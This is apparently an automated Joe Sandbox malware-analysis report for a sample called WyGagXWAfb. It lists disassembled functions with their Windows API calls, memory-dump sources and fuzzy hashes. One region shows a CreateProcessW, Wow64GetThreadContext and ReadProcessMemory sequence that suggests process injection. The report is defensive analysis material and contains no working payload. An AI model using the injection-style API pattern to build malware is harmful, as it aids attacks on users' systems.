Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
Instruction ID: 669c2738371b49a1cfe35eae014f307c81c1f000cbdf882e6ad69fe692c46550
Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
Instruction Fuzzy Hash: 28E012B160D7014ACA24A678AD55AA367FE9F48360F280C9DF41DDF182DE24E8418124

Function 00B1AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 00B5002B

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 0f1c81395a1d9fdfb706ef3c6247037946dc3046d10d9187ce329f8cc6990e19
Instruction ID: a6e62586196cde9db0030db210a55746608eae409330d6912db96dc12c48b164
Opcode Fuzzy Hash: 0f1c81395a1d9fdfb706ef3c6247037946dc3046d10d9187ce329f8cc6990e19
Instruction Fuzzy Hash: 4F222970509241DFC724DF14C494BAABBE1FF45300F5589ADE89A9B362DB31ED85CB82

Function 00B14DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B14E1A

Strings

EA06, xrefs: 00B4DCF5

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: 3a872942660fdad8255a7e3989bf929c6b63deb4e60d62eadf79f3e615a7f68c
Instruction ID: 10dca4359905616540149d05eb18c6ebf8d96134477f0eae0aecf2a944182571
Opcode Fuzzy Hash: 3a872942660fdad8255a7e3989bf929c6b63deb4e60d62eadf79f3e615a7f68c
Instruction Fuzzy Hash: 26417C73A041589BCF295B6488917FF7FE6EB45300FE840F5E8829B282C7219DC183A1

Function 00B17BB1 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B17C0B
_memmove.LIBCMT ref: 00B17C76

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: df870c23fbde8e4f9843c2a84841b3166521e4e91936f8862c7bbe31475a473a
Instruction ID: bda6be22951cc13143e377c0b22707fc0b4348211a4473c674fc852418a3bc97
Opcode Fuzzy Hash: df870c23fbde8e4f9843c2a84841b3166521e4e91936f8862c7bbe31475a473a
Instruction Fuzzy Hash: 5F31A7B1644506AFC714DF2CD8D1EA9B3E9FF483107658669E915CB291DF70E890CBD0

Function 00B1492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00B14992

Part of subcall function 00B335AC: __lock.LIBCMT ref: 00B335B2
Part of subcall function 00B335AC: DecodePointer.KERNEL32(00000001,?,00B149A7,00B681BC), ref: 00B335BE
Part of subcall function 00B335AC: EncodePointer.KERNEL32(?,?,00B149A7,00B681BC), ref: 00B335C9

Part of subcall function 00B14A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00B14A73
Part of subcall function 00B14A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B14A88

Part of subcall function 00B13B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B13B7A
Part of subcall function 00B13B4C: IsDebuggerPresent.KERNEL32 ref: 00B13B8C
Part of subcall function 00B13B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00BD62F8,00BD62E0,?,?), ref: 00B13BFD
Part of subcall function 00B13B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00B13C81

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B149D2

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: dca167322bf53ba43192bfe6088ef2e9348d2aff3be9254c6a18b80660f1ffb5
Instruction ID: 34992b70c722f9c13c740994607f3ba11b0786682e95a0be1fa3ac04b3b52335
Opcode Fuzzy Hash: dca167322bf53ba43192bfe6088ef2e9348d2aff3be9254c6a18b80660f1ffb5
Instruction Fuzzy Hash: C81156719193119BC700EF68E85599AFBE8EF98710F00456BF045872A1EB709A88CF92

Function 00B30FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B3594C: __FF_MSGBANNER.LIBCMT ref: 00B35963
Part of subcall function 00B3594C: __NMSG_WRITE.LIBCMT ref: 00B3596A
Part of subcall function 00B3594C: RtlAllocateHeap.NTDLL(010A0000,00000000,00000001,00000000,?,?,?,00B31013,?), ref: 00B3598F

std::exception::exception.LIBCMT ref: 00B3102C
__CxxThrowException@8.LIBCMT ref: 00B31041

Part of subcall function 00B387DB: RaiseException.KERNEL32(?,?,?,00BCBAF8,00000000,?,?,?,?,00B31046,?,00BCBAF8,?,00000001), ref: 00B38830

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: c32d9d73ebe9672999dbb09396cf1c0a05a128ee0cb2643877475bac74bb8263
Instruction ID: b2a3abca2aec55e398fc163eed53722dc8728ad881540e226b2293def2514124
Opcode Fuzzy Hash: c32d9d73ebe9672999dbb09396cf1c0a05a128ee0cb2643877475bac74bb8263
Instruction Fuzzy Hash: FBF0A435504319A6CB25BF9CEC16ADF77EDDF01351F3004E5F804A6992DFB19A849291

Function 00B355D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B38D68: __getptd_noexit.LIBCMT ref: 00B38D68

__lock_file.LIBCMT ref: 00B3561B

Part of subcall function 00B36E4E: __lock.LIBCMT ref: 00B36E71

__fclose_nolock.LIBCMT ref: 00B35626

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: a1b74e2e7c86d97dd7483632128a375ea0db31bfa7841e832696fc83624cf289
Instruction ID: 6715da62d62d01a34f2386966d12b07cd188bf85af420c82802ef96222a4bdff
Opcode Fuzzy Hash: a1b74e2e7c86d97dd7483632128a375ea0db31bfa7841e832696fc83624cf289
Instruction Fuzzy Hash: A1F0B471904B05AAD731AF758803B6EB7E16F40334F7582C9B824AB1C1CF7C9A019B96

Function 01E9129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01E91A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01E91AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01E91B13

Memory Dump Source

Source File: 00000000.00000002.1710854008.0000000001E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e90000_WyGagXWAfb.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction ID: deaa8d505f49778c15cf08602d538a8f82c4dba5332b0e24510b37bc5b0bd738
Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction Fuzzy Hash: A412BE24E14658C6EB24DF64D8507DEB232EF68300F10A4E9910DEB7A5E77A4F81CF5A

Function 00B1766F Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B1774A

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: bf36827b689a1b4ebb110bf77512c428f3a1a98ecd067543dd05e8c1636a9079
Instruction ID: 5c6e40197eb3891409f612a7902e3f747a6f89e773aecad87c4dec1ff5ce3681
Opcode Fuzzy Hash: bf36827b689a1b4ebb110bf77512c428f3a1a98ecd067543dd05e8c1636a9079
Instruction Fuzzy Hash: F2317079248A02DFD7249F18C590961F7F0FF09310B64C5A9E99A8B7A5EB30EC81CB94

Function 00B500D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00B500E1

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: c10cc18dc59c4cd18854bf86974574169173f889eb1efcf7352cdb5791737436
Instruction ID: 695e976fdf57843dd255f64a8eeb1168a6b409069c72ab7a68e45fb7f46a9c4d
Opcode Fuzzy Hash: c10cc18dc59c4cd18854bf86974574169173f889eb1efcf7352cdb5791737436
Instruction Fuzzy Hash: 74410474508351DFDB24DF18C484B5ABBE0FF45318F5988ACE8899B762C732E889CB52

Function 00B17CB3 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B17D13

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 963069d8f4cb6848c7b87a1ed8dd55871bb21a85f75287c82e2c70e4cbfc9f46
Instruction ID: 05b7650feee17a062ea23050c685e1c8f42d69b5270252e0928bd7312b41c402
Opcode Fuzzy Hash: 963069d8f4cb6848c7b87a1ed8dd55871bb21a85f75287c82e2c70e4cbfc9f46
Instruction Fuzzy Hash: C721D17160460AEBDB144F14F882B797BF4FF58350F2184AEE486C7191EF3092D0A745

Function 00B14F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B14D13: FreeLibrary.KERNEL32(00000000,?), ref: 00B14D4D

Part of subcall function 00B3548B: __wfsopen.LIBCMT ref: 00B35496

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00BD62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B14F6F

Part of subcall function 00B14CC8: FreeLibrary.KERNEL32(00000000), ref: 00B14D02

Part of subcall function 00B14DD0: _memmove.LIBCMT ref: 00B14E1A

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 75be28ece3bd0d3b85202df8c257f6f1bbbac2b510cab097f6e0d5c5fca9bb74
Instruction ID: a691006cecdef2defebf280300171305b99893eb0c47ee69a99caa4b9acadb57
Opcode Fuzzy Hash: 75be28ece3bd0d3b85202df8c257f6f1bbbac2b510cab097f6e0d5c5fca9bb74
Instruction Fuzzy Hash: 1611E331A0060AAACF24AF70DC46BEE77E8DF44710F6084A9F545A62C1DF719A499BA0

Function 00B501AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00B501BB

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 9b076ed92c344478cc66ea97953f71d310f8a1908e6da8c374603e58a5ee4b4f
Instruction ID: 96dad8e15519ef43b00807a8f5cbe836b1b8609dfafea09abec84c06f8021701
Opcode Fuzzy Hash: 9b076ed92c344478cc66ea97953f71d310f8a1908e6da8c374603e58a5ee4b4f
Instruction Fuzzy Hash: 82214FB5508341DFCB24DF24C484B5ABBE4FF88314F1489A8E88A97722C731F889CB52

Function 00B34A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00B34AD6

Part of subcall function 00B38D68: __getptd_noexit.LIBCMT ref: 00B38D68

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 3e45f285b2eaf3e39dae22a3af56bf4f7ee1ddab44d78cb4bdbd50b4d6cc068a
Instruction ID: f2771d7836db3337d14b7074337dbdbbea1b8c7f2f0e80b6a9d1b95e20e0751d
Opcode Fuzzy Hash: 3e45f285b2eaf3e39dae22a3af56bf4f7ee1ddab44d78cb4bdbd50b4d6cc068a
Instruction Fuzzy Hash: 86F0AF31940309ABDF61AF648C0679F77E1EF00325F248598B424AA1E1DB789E50DF52

Function 00B14FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00BD62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B14FDE

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 92153ed5dd0933e2380df38d27ccc7376180de33daf8f29c14192d5c563063f8
Instruction ID: 80fda87962a2272163ccc8409463c3aecb02e5bb07b1b26d83e1d3b8f0a3b690
Opcode Fuzzy Hash: 92153ed5dd0933e2380df38d27ccc7376180de33daf8f29c14192d5c563063f8
Instruction Fuzzy Hash: BFF039B1105712CFCB349F64E4948A2BBE1FF143293608ABEE1DA82710C771A895DF40

Function 00B309D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B309F4

Part of subcall function 00B17D2C: _memmove.LIBCMT ref: 00B17D66

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: b4fd74b5e3ce88625e669f8e0c0f394d01c244161ea014caff087f3c94c45916
Instruction ID: 1f48befb4020cffb7ae2251b8afa39703b761f638ec6fe9a5d309dec7a11fd68
Opcode Fuzzy Hash: b4fd74b5e3ce88625e669f8e0c0f394d01c244161ea014caff087f3c94c45916
Instruction Fuzzy Hash: CDE0867694422857C720D6989C05FFA77EDDF896A0F0401F6FC0CD7204DD609D818690

Function 00B3548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00B35496

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 46430290342947f131b23de289877d68af129d5b32f12593fbe09862aadc9568
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 07B0927684020C77DE112E82EC02A593B599B40678F808060FB0C18262A673A6A09689

Function 00B30E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00B30EF7

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 7c85c87373203680dd381b9889b3b62fa70d6f4e2dbddc4a878496f322b9030d
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 0E31CF74A10115DBC718EE58C4A0969F7E6FF59300F788AE5E40ACB651DB31EDC1CB80

Function 01E922A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01E922B1

Memory Dump Source

Source File: 00000000.00000002.1710854008.0000000001E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e90000_WyGagXWAfb.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 2e304d0cf8fddd5fc4ae373d5efcbc8c9c8c25bb7144521b23f48fe49615ab67
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 3DE0E67494010EEFDF00EFB4D54969E7FB4EF04701F1001A1FD01D2281D6309D508A72

Non-executed Functions

Function 00B9CDAC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00B12612: GetWindowLongW.USER32(?,000000EB), ref: 00B12623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00B9CE50
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B9CE91
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00B9CED6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B9CF00
SendMessageW.USER32 ref: 00B9CF29
_wcsncpy.LIBCMT ref: 00B9CFA1
GetKeyState.USER32(00000011), ref: 00B9CFC2
GetKeyState.USER32(00000009), ref: 00B9CFCF
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B9CFE5
GetKeyState.USER32(00000010), ref: 00B9CFEF
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B9D018
SendMessageW.USER32 ref: 00B9D03F
SendMessageW.USER32(?,00001030,?,00B9B602), ref: 00B9D145
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00B9D15B
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00B9D16E
SetCapture.USER32(?), ref: 00B9D177
ClientToScreen.USER32(?,?), ref: 00B9D1DC
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00B9D1E9
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B9D203
ReleaseCapture.USER32 ref: 00B9D20E
